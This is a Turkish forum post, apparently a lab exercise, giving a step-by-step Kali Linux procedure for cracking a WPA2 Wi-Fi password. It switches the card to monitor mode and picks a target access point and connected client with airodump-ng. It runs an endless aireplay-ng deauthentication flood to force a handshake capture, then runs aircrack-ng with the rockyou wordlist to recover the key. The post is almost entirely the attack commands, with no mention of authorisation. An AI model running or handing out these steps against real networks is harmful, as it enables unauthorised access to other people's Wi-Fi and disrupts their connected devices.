Kali İşletim Sistemindeki Airodump-ng Aracıyla Kablosuz Ağda WPA2 Şifreleme Türünü Kullanan Erişim Noktalarını Tespit Etme

Rıdvankaya

Uzman Üye
Katılım
21 Eyl 2023
Mesajlar
95
Tepkime puanı
42
Puanları
18
Yaş
31
Konum
Midyat/Mardin
Web sitesi
github.com
Kali İşletim Sistemindeki Airodump-ng Aracıyla Kablosuz Ağda WPA2 Şifreleme Türünü Kullanan Erişim Noktalarını Tespit Etme
Aşağıdaki işlem adımlarına göre airodump-ng aracının encrypt parametresiyle kablosuz ağdaki erişim cihazlarından WPA2 şifreleme türünü kullananları bulunuz.
1. Adım: Kali Linux konsol satırına sudo airmon-ng start wlan0 yazarak ağ kartını monitör moda geçiriniz.
2. Adım: Komut satırına sudo iwconfig yazarak, ağ kartının monitör modda olup olmadığını kontrol ediniz.
3. Adım: Komut satırına sudo airodump-ng wlan0 --encrypt wpa2 yazarak kablosuz ağ için
tarama başlatınız.
4. Adım: Hedef cihazın MAC adresini ve kanal numarasını seçiniz.
5. Adım: Komut satırına sudo airodump-ng --bssid Hedef Cihaz MAC Adresi -c Kanal No wlan0 yazınız. Seçilen hedef cihazı dinlemeye alarak bu cihaza bağlanan istemcileri ve MAC
adreslerini bulunuz.
6. Adım: Komut satırına sudo airodump-ng -c Hedef Cihaz Kanal No --bssid Hedef Cihaz
MAC Adresi -w /root/kali/Desktop/deneme yazınız. Seçilen hedef cihazla belirtilen kanal numarasından bağlantı kurup, yapılan görüşmelerden bir bilgi paketi yakalayarak deneme.cap
ismi ile masaüstüne kaydediniz.
7. Adım: Başka bir komut penceresi açınız ve komut satırına sudo aireplay-ng --deauth 0
-a –bssid Hedef Cihaz MAC Adresi –c Hedefe Bağlı Olan istemci MAC Adresi wlan0 yazınız. Bu işlem ile hedef erişim noktası ve istemci cihaz arasına girerek sahte kimlik doğrulama paketleri gönderiniz.
Bu işlemde kullanılan --deauth 0 ile çok sayıda sahte kimlik doğrulama paketini, -a ile parolasını kırmak istediğiniz hedef erişim noktasını, -c ile de hedef erişim cihazına bağlı istemcinin MAC
adresini belirttiniz.
Bu işlem sonucunda hedef erişim noktasına bağlı cihazın bağlantısı sonlanır ve erişim noktası
ile el sıkışma olayı (handshake) gerçekleşir.
8. Adım: Başka bir komut penceresi açınız ve komut satırına sudo aircrack-ng –w /home/
kali/Desktop/rockyou.txt /home/kali/Desktop/deneme-01.cap yazınız.
Bu komut satırı ile yakalanan deneme-01.cap isimli dosya çözümlenmeye başlar ve masaüstünde bulunan rockyou.txt isimli dosyadaki şifrelerle karşılaştırılarak hedef cihazın WPA şifresi kırılır. WPA şifresi rockyou isimli dosya içinde olan bir şifre ise ekranda bu şifreyi gösterir, değilse şifre bulunamadı. yazar.
9. Adım: Şifre çözümleme işlemi uzun sürer.
 
Üst